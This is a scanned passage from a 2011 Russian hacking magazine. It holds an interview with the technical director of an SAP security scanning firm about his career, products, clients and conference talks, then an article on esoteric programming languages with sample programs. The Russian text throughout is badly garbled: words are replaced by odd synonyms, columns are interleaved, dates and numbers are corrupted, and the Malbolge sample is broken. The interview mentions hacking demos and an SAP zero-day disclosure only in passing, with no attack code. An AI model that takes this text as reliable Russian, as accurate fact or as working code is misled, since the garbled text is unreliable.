Ну, на общем тутовник ничто необычного, по сию пору хватит стандартно. Увлечениематематикойяперенялототца,эзотерической литературой во смеси вместе с различными духовными практиками-от

матери. В общем, однако сие наверно повлияло для мое становление. После школы поступил в области олимпиаде во Политех возьми факультетзащиты информации. Кстати, поступал ради компанию, в всяк случай, а

заключая на первых порах хотел делать компьютерным дизайном, на правах бы смешно зто без дальних разговоров ни звучало. Но за неграмотный абсолютно честных способов поступленияэтотвариантотвалился , чемуясейчасрад.Нуавунивере на третьем курсе понял, зачем хочу знать, что во что такое? бы в таком случае ни стало ломаютсистемы

ке софта с целью анализа защищенности

!иначе непонятно, через ась? я, собственно, вынужден их защищать!. Я купил

бизнес-приложений

журналец «Хакер>>, подписался получи и распишись какую-то рассылку по мнению ассемблеру, неужели равно

SAP.

начал обыскивать винтернетесервера от РНР-инклудами. Где-то год проработал админом на жалкий компании, идеже позволено было в свободное период упражняться безопасностью, а позднее ото Леши Синцова узнал, что-то кушать компания, во которой дозволительно ломать, ну да снова да финансы за это получать. Правда, равно задачки тама были недетские: для примеру, обойти защиту через переполнения во ХР, в некоторых случаях сего до сей времени ни одна душа безграмотный мог сделать. Долго готовился, читал разную литературу да на итоге напросился возьми собеседование, во процессе которого ми на течениетрех часов методично давали понять, аюшки? пишущий эти строки синь порох никак не знаю, равно суммарно пишущий эти строки

никто. Потом дали тестовое задание- раскопать незащищенность во сервисе и написать эксплоит из обходом ASLR. В общем, на итоге ми сказали ладно, где-то литоринх равным образом быть, можешь прибегать стажером, что-то извилина на месте, остальное придет.

ХАКЕР

01/154/2011

099


СЦЕНА/ИНТЕРВЬЮ

КАК ТЫ ОЦЕНИВАЕШЬ ПОЛЬЗУ ОТ

подумал, почто написав книгу, автор смогуписатьстатьи

потратилиоченьмного времени. Меняпугало

ПОЛУЧЕННОГО ОБРАЗОВАНИЯ?

малограмотный напрягаясь. Напрягаться на итоге до сей времени равняется

полное лишение предложений получай рынке присутствие

приходится, так особенный исследование автор получил . По

очевидной необходимости данного решения. Ну никак не

На самом деле, у нас на универе действи­

времени это, конечно, ужасный труд: не без; ужасом

можетбыть такого, с намерением шишка на ровном месте отнюдь не нашел да далеко не

тельно бессчётно чему учат, хоть в то время

вспоминаю, равно как вселетотратил нате сие объединение 00 часов на

делает давно этих пор ни плошки подобного . Где подвох?

день. Короче, инда касаться отнюдь не хочется:] .

Собственно, пребывая во сих раздумьях, пишущий сии строки да дали

казалось, почто супруга с этого- бесполезно.

фору нашемуосновному конкуренту, а затем равно сызнова

Спасиботем немнагим преподавателям, таким

r.1

одной компании, которыевыпустилипродукт

привитьлюбовь ко предмету. Так чтотеоретиче­

НА ТВОЙ ВЗГЛЯД, МОГУТ ЛИ ТРИ ra;.l ТАЛАНТЛИВЫХСТУДЕНТАСДЕЛАТЬВ

ская основание Политеха адски мощная, равным образом сотрудников

РОССИИБИЗНЕСВОБЛАСТИИБ?ИЛИБЕЗ

щих продуктов автор с успехом догнали, а грубо

на компанию предпочитаю вербовать с того места -они

ЛИЦЕНЗИЙ, БУМАЖЕК И ГЕНЕРАЛАФСБ В

равно перегнал и, а второй-это, собственно, далеко не сколько

получай ватерпас раньше других претендентов. А получай

РУКОВОДСТВЕНИЧЕГО НЕ СВЕТИТ?

иное какдесять модулей суязаимастями подSАР на

что Платонов равно Семьянов, которые пытались

немногораньше.Носейчасодинизконкурирую­

графическом интерфейсе. Даже у нашей

работе меня учил Вейдер, симпатия любил говорить: «Штукирко, когда твоя милость далеко не зОхекаешь оный сервер, ваш покорный слуга

Я думаю, что-нибудь может все, другоедело­

бесплатнойутилитысейчас порядкасорока

тебе руку сломаю>>,- воттак да учил.

который-нибудь ценой. Ну равно глядючи что выеокоты

модулей :1.

хочешьзалезть [хотя после этого делоуже далеко не «в области

r.1

РАССКАЖИ, ЧЕМ ТЫ ЗАНИМАЕШЬСЯ И

ra;.l ЧТО ТЕБЕ ИНТЕРЕСНО БОЛЬШЕ ВСЕГО

ИБ», а «в России»] . Но этотбизнесдовольно

РАССКАЖИ НЕМНОГО О КОНКУРЕНТАХ,

сложныйдажедля средней компании.

ЧТОЭТО ЗА КОМПАНИИ?

r.1

Основнойконкурент-этоаргентинская

В ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ . КТО ЧАЩЕ ВСЕГО ЯВЛЯЕТСЯ ВАШИМИ

Последнеевремясфераинтересоввсе

ra;.l КЛИЕНТАМИ? С КАКИМИ ЗАДАЧАМИ К

свыше расширяется, на нее входятидругие

ВАМ ОБЫЧНО ОБРАЩАЮТСЯ?

областитипауправления проектами, маркетинга,

шарага

Onapsisc продуктом Х1 . Но

напрямую сопоставлять наши пищевые продукты все-таки нельзя: у них дьявол предназначен на основном на

саморазвития равно прочего. В области ИБ мое

Клиенты -в основном большой бизнес.

пентестеров равным образом консультантов, позволяет

вниманиепривлекаютсложныебизнес­

Задачипрактическиизвсехвозможных

выжимать пот уязвимости. Мы но изначально

приложенияилисистемы,вкоторыхденьгилежа~

областей, они фактически описаны на разделеуслуг

ориентиравались хлеще сверху систему мониторинга

Ну либо — либо хоть бы бы земляное масло переливается. А и

получи и распишись нашем сайте: экспертиза защищенности, тесты получай

равным образом согласие стандартам, чем натулзу интересах

маппинг программныхуязвимастей получи бизнес­

проникновение, сертификация, а и исследование

пентестеров . Поэтомунаш продуктболее развите

риски [например, во вкусе умыкнуть цистерну нефти,

отдельных приложений. Наиболее интересное с

области многопользовательского доступа,

хакнув систему контроля]. Если болеетехнически,

тех направлений, которые да мы вместе с тобой во последние годы

управления сканированиями да категоризацией

так ми нравится предмет поиска уязвимастей равным образом

всесторонне развиваем, -анализ защищенности

проектов . Мы в меньшей мере ориентированы получи и распишись

комплексного аудита защищенности сложных

бизнес-приложений другими словами отдельных ключевых

проверка черным ящиком, добро бы без дальних разговоров

систем. В уязвимастях фанатею с бизнес-логики

элементоввИТ-структуре компании. Это системы

конкурируем равным образом на этой области, добавив на недавнем

видать обхода авторизацииинестандартных багов.

ДБО равным образом АБС, платежные шлюзы, платформы

релизефункционаланонимногосканирования

Наверное посему люблю сложные системы, во них

виртуализации, промышленные системы и,

[пентеста], которым оченьудобно злоупотреблять

чище допустимость встретиться необычные ошибки

естественно, ERP [в частности SAP].

быть проведении аудитов SAP про выполнения

рутинныхзадач [в нежели пишущий сии строки личноубедились в

не так — не то векторы, требующие реализации связки различныхуязвимостей. Если апострофировать кого касательно том, что, наоборот, безграмотный мое, ведь сие наверно реверси н г, ну-кась равно

ЗПД очевидно же:].

ТВОЯ ДОЛЖНОСТЬ НАЗЫВАЕТСЯ

одном с аудитов].

<<ТЕХНИЧЕСКИЙ ДИРЕКТОР». А ЧЕМ КОНКРЕТНО ТЫ ЗАНИМАЕШЬСЯ?

СКОЛЬКОЧЕЛОВЕКЗАНИМАЕТСЯ ПРОЕКТОМ ERPSCAN И НЕПОСРЕД­

ПОЧЕМУ ТЫ СТАЛ ЗАНИМАТЬСЯ

АУДИТОМ ORACLE?

Прежде лишь ваш покорнейший слуга целиком и полностью клянусь из-за

СТВЕННО ЕГО РАЗРАБОТКОЙ?

прогресс нашего продукта-сканера

безопасности SAP ERPScan . Я курирую практиче­

Этот спрос получается после граница NDA. Ну а получи и распишись

В ходе работ в соответствии с тестам получи и распишись проникание да

ски все, в чем дело? связано от продуктом, опричь продаж:

самом деле людей неустанно малограмотный хватает,

внутреннемуаудитучасто встречался

исследования, разработка, сопровождение,

круглым счетом что-то милости просим, раздел вакансий всякий раз

пресэйлз, а тоже маркетинг/пиар сверху западыня .

открыт. Даже когда конкретной вакансии несть сверху

Оракл. Я осознавал порок информации в соответствии с

сайт~пустьэтоваснеостанавливае~

данной системе промеж наших экспертов равным образом решил изучить нишу глубже, тем побольше что-то кэтому

КАК ТЫ И ТВОИ КОЛЛЕГИ ПРИШЛИ К

времени мои прошлыеувлечения [например,

РАЗРАБОТКЕ ПОДОБНОГО ПРОДУКТА?

Wi-Fi, объединение которому автор этих строк писал диплом] никак не сулили

Рисерчеры, аналитики, тестеры -все нужны. Мы вообще беспрестанно во поиске новых исследовате­

лей, аналитиков да пентестеров. Но, чистосердечно

развития, а другая моя любовь-wеЬ­

После написания книги насчет Оракл ми

говоря, важный дисконт людей, приходящих получай

уязвимости-стала уже усердствовать попсовой :].

захотелось что-то побольше неизведанного равно

собеседования, меня беда огорчает. Толковые

сложного . Варианта былодва-SАР да АСУ-ТП

люд попадаются, так зто раритет [хотя,

МЫ ЗНАЕМ, ЧТО ТЫ ДАЖЕ НАПИСАЛ

[SCADA]. В так срок ни тем, ни другим на России отнюдь не

казалось бы, сейчас, вместе с такого склада огромной базой

КНИГУПОАУДИТУОRАСLЕ.ЗАЧЕМ?

занимался никто, ей-ей равным образом во мире во целом было маленько

информации в соответствии с нашей теме во интернете, проблем

специалистов. При этом SAP на практике встречался

начинаться неграмотный достоит вообще]. Но много раз народ

получи и распишись аудитах, приближенно что такое? SCADA аз многогрешный решил покончить нате

аспидски неярко себя показывают получи собеседовани­

Ну, вдобавок того, чтохотелосьсделать лепта во

потом. Ну и, собственно, проникнув втемуSАР

ях, зато следом торчмя взрываются идеями да

российскую литературу по части ИБ, безусловно равным образом заключая

побольше глубоко, осознал, в чем дело? глотать незанятая сфера на

конкретными делами. Такоетоже бывает.

М НОГОЛИ НА ЭТОУШЛО ВРЕМЕ Н И?

дать по малой мере какую-то пользу людям, этобыло

области сего продукта. Основной задачей было

своеобразное досмотр себя. Решил установить

понять, который возлюбленный хорэ выказывать изо себя, равным образом во

КАК К ВАШЕМУ ПРОЕКТУ ОТНОСЯТСЯ

мета идабиться ее. С практическойточки зрения-

каком виде нужен обществу. На сии вопросы автор

РАЗРАБОТЧИКИ SAP'A?

В ЯНВАРЕ 0008 ГОДА САША ПОЛЯКОВ НАПИСАЛ СВОЮ ПЕРВУЮ СТАТЬЮ В ХАКЕРЕ «ГРУБЫЕ ОПЫТЫ НАД ORACLE»

000

ХАКЕР

01/154/2011


Разработчики

SAP,

моя особа думаю, суммарно живут

во танке. Ну а Pгoduct Secuгity

Response

:1.

Нуконечнонекучастран,всегонаверное

Конечно, повальность перипетии дает по отношению себя знать:

неподалёку 05, же этой темой автор этих строк заболел, беспричинно что-то

в чем дело? до этого времени приходится испробовать несмотря на то бы единожды во жизни если не имеется знакомых, ведь достаточно кончено прескучно

борзо надеюсьдогнать Артемия Лебедева. В целом

nроявляют интерес. Причем безвыгодный только лишь для сканеру,

внутри десятитысяч людей, как бы бы самобытно сие невыгодный

для отдыхлюблю ездить на Азию равно внепопулярные

а равным образом ко множествубесплатных утилит, которые

казалось. На блекхате ноль без палочки отнюдь не возится со

направления, затем что во популярныетак или — или если

автор сих строк выпускаем

докладчиками равно как вместе с детьми, далеко не устраивает им

попадаю в области работе. Европу никак не жуть люблю, после по сию пору

специальныхужинов,вечеринокиэкскурсий.

усердствовать некогда по чести сколько ли, ежели и Барселона,

ЕСТЬ ЛИ У ВАС КАКОЕ-ТО ОБЩЕНИЕ С

Там весь предоставлены самочки себе. Успел

город дождей равно Амстердам-это места, во которых стоит только

SAP, КАК ОНИ ВАС ВООБЩЕ ВОСПРИ­

отсечь флаер сверху вечеринку с

Team,

r.1 11:;.1

со которой автор nостоянно сотрудничаем,

НИМАЮТ?

Rapid7- моло­

самым необходимым равным образом легко колеситьбез

того круче: с годами иногда равным образом получи реферат невыгодный пустят,

определенной цели да места ночлега . Безумно

Общение кардинально партнерское. Мы невыгодный

опоздай твоя милость сверху минуту, народ залы переполнены, равно

только лишь находим баги, а равным образом помогаем

мест неутомимо безграмотный хватает. Это тебе далеко не шутки:

согласно правилам их закрыть, а и консультируем за

побывать. В Азии люблю вынимать мотоцикл, заплечный мешок от

дец, малограмотный успел- сиди дома:] . Хотя получи и распишись дефконе равно

05

000 куверта получи и распишись 0 залов:].

крутые да дикие места снедать получи севере Бал и: вулканы, озера идикие пляжи, населенныетолько

обезьянами, которые занимаются всяким, не стесняясь никого. Очень красивые места возьми

вопросам безопасности на целом, каждый год

r.1

встречаемсялично.Покаофициального

С КЕМ ИЗ ИЗВЕСТНЫХ В ОБЛАСТИ ИБ

партнерского статуса нет, понеже шатия-братия

01:;.1 ЛЮДЕЙ УДАЛОСЬ ПОЗНАКОМИТЬСЯ НА

крупная, да весь адски далеко не просто. К сожалению, во их

ТАКИХ МЕРОПРИЯТИЯХ?

островах во Таиланде. Полнейшая отчуждение через

остального мира. В этом году надо надеяться посетить наконец Камбоджу равным образом Лаос, что касается нежели мечтал последние

три года, а ни перед каким видом никак не был в силах доехать. На этом вместе с Азией

глобальной экасистеме прямо-таки неттакого рода

партнеров. Хотя величина компаний, которые

Слушай, неужели известность-это деяние такое,

я, наверное, сделаю паузу да переключусь сверху

ищутуязвимости да получаютотSАРофициаль­

звезды меняются:]. Да равно на разных

ЛатинскуюАмерику либо Океанию. Везде

ные благодарности, растет, для постоянной

областях-свои кумиры. Кому-то Гроссман- гуру,

занимаюсь каким-нибудьэкстремальным видом

основе сим занимаются всего лишь три компании.

кому-то НDМооге, а кому-то Митник. Я себя особой

спорта : держи Бал и, естественно, серфинг, во

цели не без; кем-то ознакомиться малограмотный ставил. Но

Сингапуре-вейкборд,вТайланде-стантрай­

решили крошку напугать народ, объявив,

недавнооказалсянаоднойконфесВичфилдом

динг, нет слов Вьетнаме-кайт, а на Индии порядочно

аюшки? нате предстоящей конференции

Диффи. Я раньше ажно равным образом безвыгодный понял, кто именно он, равным образом исключительно

прямо накататься сверху поездах третьего класса:]. :х:

Чтобы животворить общение, автор намедни

BlackHat наша сестра

по мнению кажем Оdау-уязвимость, которой подвержена

далее по меня дошло. Вотэто на поверку звезда. Н уа

средина торчащихвинтернет SАР-систем.

с простоголюда ваш покорный слуга наконец-то вживую познакомился

Клиенты

фактически со всеми Огасlе-гурутипа Корнбруста

SAP перепугались, начали кричать бери всех перекрестках на

SAP равным образом молить помощи. Зато небезукоризненность была

иЛичфилда, подарил им сообразно копии своей книжки.

закрыта из-за пару недель, ежели и перед сего цифра

Часто встречал Де нате Камински, же дружить вместе с

месяца висела во Репdiпg-статусе.

ним было невозможно, симпатия был неослабно на стельку.

r.1

В ПОСЛЕДНЕЕ ВРЕМЯ ТЫ ОЧЕНЬ МНОГОУЧАСТВУЕШЬ В КОНФЕРЕНЦИ­

ЯХ ПО ИБ . НЕ НАДОЕЛО?

ТЫ ПЫТАЕШЬСЯ КАК-ТО РАЗНООБРА-

01:;.1 ЗИТЬСВОИ ВЫСТУПЛЕНИЯ? БЫЛИ ЛИ КАКИЕ-ТО ПРИКОЛЫ ВО ВРЕМЯ ДОКЛАДОВ?

Это врядли надоест. Хотя, конечно,

Ну, автор пару единожды начинал личный известие получи и распишись

попадаются да порядочно скучные события, однако

русском равно беспричинно продолжал пару минут, временно

сверху каждой конференцииестьмножество

у слушателей бельма безвыгодный выросли, что тарелки. А

вариантовзанятьсебяипровестивремяспользой.

дальше говорил <<Извините, забыл переключить

Во-первы~этоопытпредставлениядокладо~

раскладку» равно продолжал сейчас по-английски .

каковой конкретно отличается через выступлений

Народ оценил.

получи и распишись родном языке. Во вторых, шанс

Неплохой был хохма из демонстрацией жи­

поучитьсяукрутыхдокладчиковихприемам.

вого взлома SАР-клиента. Я объявил, что-нибудь не откладывая

В-третьих-взглядсо стороны для чужие ошибки, а

взломаю главнейший попавшийся ми SАР-клиент,

в-четвертых- попадаются всерьёз

некоторый найду на Гугле. Я зашел сверху

хорошие доклады, в читание которых во виде

PDF

google.com,

вбил соответствующую строку интересах поиска

только и знает недостает времени, несомненно да явление безграмотный тот. Ну и,

уязвимых сайтов да всерьёз поломал

естественно же, контакт из интересными людьми,

центральный попавшийся ми сайт :]. Впрочем,

визит новых мест да прочее. Конференции­

книговыдача гугла была подстроена, а взламы­

сие одно с немногих событий, идеже не грех нет проблем

вался местного значения сервер. Народ был во шоке:

иметь приятное вместе с полезным.

думали, зачем моя персона по сути дела ломанул кого-то во

интернете, говорили, что такое? пишущий эти строки буйный ...

КАКОВЫ ТВОИ ВПЕЧАТЛЕНИЯ ОТ

Ну а ась? делать, блекхат- сие блекхат,

СВЯТАЯ CBЯTЫX-DEFCON И

племя требует зрелищ! И для тому же, во оный

BLACKHAT, КОТОРЫЕ ПРОШЛИ В ВЕГАСЕ?

час винтернетереально было короче

СТОИТ ЛИ ОНО ТОГО, ЧТОБЫ СТРЕМИТЬСЯ

уязвимых серверов, да американская

ТУДАСЪЕЗДИТЬ?

арестантская меня отнюдь не прельщала.

Безусловно, сие те события, бери которых стоит проведать пускай бы бы раз в год по обещанию во жизни . Хотя я в принципе придерживаюсь праздник точки зрения,

ХАКЕР

01/154/2011

МЫ ЗНАЕМ, ЧТО ТЫ ПОБЫВАЛ В ЦЕЛОЙ КУЧЕ СТРАН. РАССКАЖИ О СВОИХ

ПУТЕШЕСТВИЯХ.


КОДИНГ

Виталий~ <<daredavil2014» Краечинскис ldeviiГc!softcom.lvl

глазами эзотериков ОБОЗРЕНИЕ ТЬЮРИНГОВСКОЙ ТРЯСИНЫ И МЕЧЕЛОВЕЧЕСКОЙ ЛОГИКИ Большинство программистов на поисках пути по уменьшению затрат получай разработку ПО выбирают

самые удобные технологии равно языки, наиболее приспособленные для решению конкретных задач. Но отнюдь не целое стремятся ко комфорту: возьми любое упорядочение отыщется тяготение для хаосу. Как следстsие, быть не принимая во внимание альтернативных подходов ко кодингучеловечество далеко не может.

Каждый программист, особенно нате заре своей карьеры, потратил немало ночей в целях того, чтоб произвести несколько бесполезное, нецелесоо­

бразное, изредка настоль грандиозное, зачем ставка разработки это­

го была бы огромна. Но создавалось сие невыгодный за результата !который, скорее всего, короче уничтожен в дальнейшем завершения!. Люди тратят уйму времени всего лишь потому, почто им нравится процесс, нравится трениро­ вать центр alias прямо-таки ловчиться понять, наравне с сносно не запрещается построить

многое. По т ой но причине человеки модернизируют <<москвичи>> 00-х

годов, бегают н а ходулях равным образом совер ш ают остальные поведение минус конечного результата, находя себя искусственную мотивацию.

В среде разработки языков программирования как и всегда существовал душа соревнования равно азарта. Он мотивировал созда­ вать изощренные конструкции равным образом альтернативные п одходы равно на итоге

• www.esolangs.org -

породил ц елый характеристический показатель языков, малограмотный применимых к решения задач,

ресурс, вместе с собственным wiki полностью посвящёенный

только имеющих какие-нибудь изюминки, по вине которых касательно них нел ь зя

эзотерическим языкам

• 0mhz , de/Ьfdey. html IDE на brainfuck 'a

прямо забыть. Существует бездна определений, зачем является эзотериче­

скими языками программирования !далее в соответствии с тексту- ЭЯПI, однако слож н насчёт расчислять их формальными, этак в качестве кого сии убеждения достанет

субъективные. Наиболее за п улярное что касается пр еделение ЭЯП- это языки, которые малограмотный имеют практического применения. Даже если кто-нибудь решит воспользоваться Bгainfuck или "Нарисованная" nрограмма бери языке

002

Piet относительно грамма.

FALSE сверху nрактике,

ото сего сии языки неграмотный станут поменьше эзотеричными .

ХАКЕР

01/154/2011


Кодинг глазами эзотериков

Второе отождествление частного случая ЭЯП, которое называется

-это математическая абстракция, имеющая единодержавно вход, одиночный размер выработки

трясиной Тьюринга [Tuгiпg taг-pitl,- сие языки, сверху которых не грех

да во всякий мгновение времени находящаяся на одном состоянии. На

произвести все, а околесица интересного не дозволяется проделать просто. Под сие

сени этому устройству подаются символы одного алфавита, н а

подсчёт никак не подпадают языки вместе с отсутствием Тьюринг-полноты,

выходе оно выдает символы другого алфавита, присутствие этом алфавиты

благодаря тому его также запрещается расчислять п олноценным.

могут равно совпа д а т ь. Из модели абстрактного автомата строятся мо­

дели ко н ечно г об ав т омата, автомата вместе с магазинной памя т ью, маши н ы

БЕЗУМНЫЕ ИДЕИ

Тьюринга равным образом прочие преобразователи информации .

ЭВМ- по поводу н едавнее изобретение, равно математическая

При подобном описании алгоритма имеет большое значение понима т ь, ась? показатели

фундамент интересах кибернетики равно как таковой сызнова во процессе формирова-

равно круг обязанностей перехода состояний- сие принципиально независимые

ния. Основной достижение во эволюция математического аппарата во его

мало кто равно получай разных уровнях абстракций одно может перепиваться

текущем виде ес именитый тополог равным образом конструктор Клод Эл вод

во другое.

Шеннон , перевернувший показ в рассуждении дискретной математике.

В начале холодной войны разработки по мнению дискретной матема­

Наглядно сие позволено видеть бери примере компьютерной программы. Код да переменные- сие двум области памяти: раздел

тике были таково секретными, который нетерпимо контралиравались

данных да участок кода. Однако разве полагать устройство

спецслужбами равным образом статей бери эту тематику никак не издавалось. Союз Советских Социалистических Республик знал

программы процессором, в таком случае получается, что такое? возлюбленный читает символы

по части разработках США на этой сфере, однако самочки исследования Шеннона

изо сегмента кода, а а там переходит во ведь сиречь иное капитал ради

да его соотечественников надергать им никак не удалось, впоследствии аюшки? было

обработки других символов с сегмента данных. Таким образом,

положено вердикт прекратиться сполна конец самостоятельно, от нежели величай­

рассматривая п роцессор наравне теоретичный ав т омат, мож н касательно понять,

шие умы 00-60-х годлв успешно справились. Развитие математики

в чем дело? шифр программы равно п еременные к процессара являю т ся касательно д равным образом н а­

для базе функций алгебры логики, а и передача убеждения ав т омата да

ковым входным алфавитом.

лямбда-функции привело ко созданию таких дисциплин, в качестве кого <<Теория

Достаточно важным моментом теории алгоритмов являются

автоматов>>, << Формальные грамматики >>, равным образом множества новых раз­

лямбда-исчисления. Данное логос было введено интересах формали­

делов физики.

зации принципы вычисляемости. В контексте языков программи­

Нынче многие прогрессивные вузы стали глотать теорию автоматов равным образом формальные грамматики с дискретной математики на

рования назначение является только указателемнанекоторый н абор команд, во в таком случае момент вроде на математике отправления - сие понятие,

отдельную дисциплину, практическое служба которой постичь

которое осуществляет связность средь элементами множества. Иными

сильно сложно, особенно коли твоя милость далеко не покрикивание .

словами, буде я говорим ась?

Обычно рядом изучении то-то и есть сего раздела информатики

F[al=Ь, на математике да мы вместе с тобой имеем на

виду, сколько существуют некие множества, на которых элементу <<а>>

молодняк люди, по мнению тем другими словами иным мотив м, начинают предаваться

соответствует составляющая <<Ь>> . В программировании но пишущий сии строки говорим что касается

на устройство бессмысленных, н в рассуждении сильно красивых систем. К

!ом, что-нибудь существует полоса команд, равно с целью их исполне н ия автор передаем

примеру, бери машине Тьюринга дозволено претворить в жизнь первый встречный невероятный

сила <<а>>, зачем ни на волос н е означает, сколько на что бог на душу положит пора

алгоритм, равным образом сие до чертиков без затей требовательно доказать. Правда, п ракти­

Оно может состоять непропорционально во сей момент, а будущее никак не оказываться равным.

ческого применения держи настоящий час у аппаратура нет, так неужели сие

F[a J=Ь.

Лямбда-функция является верней математической функцией, чем набором команд, равно выражается неграмотный набором действий, а неким

может остановить пытливые умы?

выражением, чаще рекурсивным.

НЕМНОГО МАТЕМАТИКИ

В лямбда-исчислении приличествовавший следующее обозначение:

а >>

иначе

автоматов. Как кого хочешь спроси изо курса дискретной математики, автоматическое устройство

по образу алгоритм, использованный ко значению, а из новый стороны что

BRAINFUCK

MALBOLGE

Пожалуй, самый в области п улярный тайный шлепалка сверху нынешний день.

Одним с немногих языков, целью которого было максималь-

<<f. a>>,

зачем соответсвует

<<f

Для понимания методов создания алгоритма нужны основные принципы теории

F[al,

но трактуется из одной стороны

Он основан получи волюм , почто каждая команда- сие безраздельно символ. Команды

да осложнить сам по себе дело написания программы, стал метла

оперируют самый модификацией памяти, вследствие чему

Malbolge,

существует огромное цифра дискуссий получи и распишись тему его применения на

Данте.

реальной жизни. Существуют идеи применения, начиная с внедрения

кто получил свое слово ото восьмого круга ада

Код первой программы держи этом языке, высиживающий

<<hello

стих равно интерпретатора в целях защиты через обратной инженерии равным образом заканчи­

woгld>>, сгенерировала другая список только что после неудовлетворительно лета

вая возможностью прямо управлением памяти вместе с через

затем написания самого языка.

макросов, написанных нате Bгaiпfuck'e. Однако но держи практике издревле принимать

В

0004

г. был написан мазер программ, высиживающий за­

паче подходящие аналоги интересах решения подобных задач. Кроме, возьми ­

факты строки, тем не менее программы, созданные сим генератором,

верное, экспериментов в области генетическому программированию, которым

получаются длиннее, нежели программы, сверху п иса нн ые человеком,

BF без упрека

извес тн ым по образу Aпthony

идет по вине пр астаты синтаксиса и, соответственно,

Youhas.

Ос н овной равным образом д еей языка является самомо д ифици р ую щ ийся ко д ,

простоты генера ц ии кода.

Основываясь для структуре языка bгa i пf u ck, было создано порядком

а и безум н ые математические преобразования. Боюсь, сколько

языков, именуемые Ьгаiпfuсk-образными. Их объединяет максимально­

когда определять целый подходец ко написанию программы получай данном

свернутый синтаксис, например, квакало коров

[Cowl, язычище орангутангов

IOwk, что касается котором автор ранее раз как-то писали!. Во всех прослеживаются идеи

языке, получится далеко не статья, а книга[, равно возможно, на нескольких томах!, nоэтому автор сумме как только приведу адрес программы

<<hello woгld>>:

механизмы Тьюринга, одначе отнюдь не спокон века что списать программу с одного языка возьми другой породы лишь только синтаксически.

++++++++++[>+++++++>++++++++++ >+++>+<<<<-]>++ .>+. +++++++ .. +++.>++.<<+++++++++++++++.>.+++. ------.---- - - - -.>+ . >.

ХАКЕР

01 /154/2 011

(=<. : 0876Z432 0UT. - Q+* )М' &%$ Н" !-} 0 Bzy?=1 {z ) Kw ZY44E q0/{mlk** hKs_dG5[ m_ BA{? - Y;;Vb'rR543 0M}/. zHGwE

003


КОДИНГ

судебное дело подсчеты

<<f»

от использованием значения <<а» . Послед­

няя формулировка связана не без; особенно используемым во лямбда­

исчислении понятием <<Ь-редукция» [курс формальных грамматик!.

INTERCAL

Вспомним первую теорему Шеннона в рассуждении разложении функции ал­

гебры логики [далее ФАЛ, сиречь булева функция!, которая важно так: Старейший, а может быть, равно центральный внутренний шлепалка про­

к любого ФАЛ, отличного ото константы:

граммирования. Он создан во

F(x1,x2, ... ,хп): F(x1,x2, ... ,хп) v!x*F(0,x2, ... ,хп).

=

x1*F(1,x2, ... ,хп)

0972

году, ведь вкушать к примеру между тем же,

в некоторых случаях Си [без плюсов!. Этот Тьюринг-полный язык- шарж на существующие во ведь эпоха нормальные языки программирования,

обладающая сверх ряда кошмарныхинетривиальных опера-

Из нее дозволено нетрудно раскусить [и в соответствии с отвести другие

ций целой толпой фантастически приятных операторов слыхать

PLEASE

теоремы Шеннона пользу кого разложения ФАЛI, что, разве я можем реализо­

[ПОЖАЛУЙСТА!, FORGET [ЗАБУДЬ! другими словами ABSTA IN [ВОЗДЕРЖИСЬ!.

вать для данном языке функции

Позтому неграмотный есть смысл удивляться, даже если на исходникахна этом языке <<с

*,v,!

[ конъю нкцию, дизъюнкцию равно отри­

цания!, да мы со тобой можем таково а исполнить любую вычисляемую функцию,

непроизносимой абревиатуроЙ » твоя милость обнаружишь конструкцию может статься

а значит, да черкануть всякий недопустимый алгоритм. Языки, получи и распишись которых

PLEASE ABSTAIN FROM CALCULATING [ПОЖАЛУЙСТА ВОЗДЕРЖИСЬ

позволительно воплотить в жизнь кому только лишь не лень эвентуальный алгорифм [вне зависимости ото

ОТ ВЫЧИСЛЕНИЙ!.

сложности реализации! называется <<Тьюрин г полный>>. Утверждение можно высказать равно побольше жестко: коли пишущий сии строки можем воплотить в жизнь

Штрих Шеффера [НЕ Иl, так можем воплотить в жизнь равно любую вычисляемую функцию. Доказательство данных утверждений аз многогрешный позволю себя опу­ стить: те, кому интересно, смогут раскопать их на учебниках. Но есть расчет память в ком живет что касается маленьком нюансе- то, что такое? неизвестно что возможно,

решительно малограмотный означает, сколько предпринять сие легко . На практике: больше чем возможно раскопать траншею от через чайной ложки, однако зто вовсе не значит, что-то сие тривиальная задача.

ДИАГНОЗ По любому изо эзотерических языков дозволено намалевать множе­

ство научны х трудов, подрабатывать их дозволительно бесконечно, а ради созда­ ния серьезных средств разработки может пенадобиться безграмотный один десяток лет. Но безвыездно сии решения вовек далеко не смогут противоборствовать с настоящими языками, которые создавались на решения практи­

ческих задач, равным образом эзотерические языки навечно останутся просто-напросто

DO ,1 <- #13 PLEASE DO ,1 SUB #1 <- #238 DO ,1 SUB #2 <- #108 DO ,1 SUB #3 <- #112 DO ,1 SUB #4 <- #0 DO ,1 SUB #5 <- #64 DO ,1 SUB #б <- #194 DO ,1 SUB #7 <- #48 PLEASE DO ,1 SUB #8 <- #22 DO ,1 SUB #9 <- #248 DO ,1 SUB #10 <- #168 DO ,1 SUB #11 <- #24 DO ,1 SUB #12 <- #16 DO ,1 SUB #13 <- #162 PLEASE READ OUT ,1 PLEASE GIVE UP

развлечением.

Регулярно проводятся олимпиады равно конкурсы соответственно решению тех

или — или иных задач не без; использованием определенных технологий, но главная виновник подобных мероприятий- назначить равно сравнить не информированность людей, а их таланты равным образом способности. Подобные задачи

SHAKESPEARE

уравнивают перевес посередь опытными программистами равным образом начинаю­

щими , же талантливыми, что, безусловно, вносит дополнительный азарт во суть соревнований.

Таким образом, становится ясно, что такое? причины в целях разработки подобных языков во всякое время будут существовать, же цели денно и нощно будут оставаться спорными.

I

Язык программирования << лебедь авона >> призван скрыть ис­

ходный шифр программы лещадь пьесы Шекспира. Список персенажей программы служит про определения стека. Герои, общаясь корешок не без;

другом, совершают операции ввода/вывода, их вопросы являются аналогами условного перехода .

Прежде нежели персенажи смогут использоваться, они должны вый­

ти бери сцену оператором Епtег, затем в чем дело? они должны удалиться со сцены оператором

Exit.

В целом устройство языка схожа не без; языком ассем­

блера, но утилита следовательно куда как длиннее равно вариантов написания алгоритма бесконечное много . Вот что зто может выглядеть:

[Eпter Hamlet апd Romeo] Hamlet: You lyiпg stupid fatherless big smelly half-witted coward! You are as stupid as the differeпce betweeп а haпdsome rich brave hero апd thyself! Speak your miпd! Языков такого как достанет много, отдельный маскируют адрес

почти рецепты, а есть такие [например,

Wh itespacel

используют всего лишь

пробелы равным образом табуляцию. Кстати, таким образом на единодержавно слова можно встроить порядочно программ получи разных языках. Все зто, безусловно, дает огромное край на фантазии по мнению применению таких подходов в

